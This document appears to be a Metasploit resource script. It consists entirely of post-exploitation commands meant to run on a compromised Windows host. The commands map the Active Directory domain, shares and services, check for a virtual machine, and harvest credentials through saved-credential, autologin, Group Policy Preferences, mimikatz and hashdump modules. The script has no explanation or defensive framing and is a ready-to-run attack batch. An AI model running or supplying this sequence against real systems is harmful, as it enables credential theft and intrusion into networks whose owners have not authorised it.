use post/windows/gather/enum_logged_on_users
run

use post/windows/gather/enum_ad_computers
run

use post/windows/gather/enum_ad_groups
run

use post/windows/gather/enum_ad_users
run

use post/windows/gather/credentials/windows_autologin
run

use post/windows/gather/credentials/enum_saved_creds
run

use post/windows/gather/credentials/gpp
run

use post/windows/gather/credentials/mimikatz
run

use post/windows/gather/hashdump
run

use post/windows/gather/enum_domain
run

use post/windows/gather/enum_shares
run

use post/windows/gather/enum_services
run

use post/windows/gather/checkvm
run
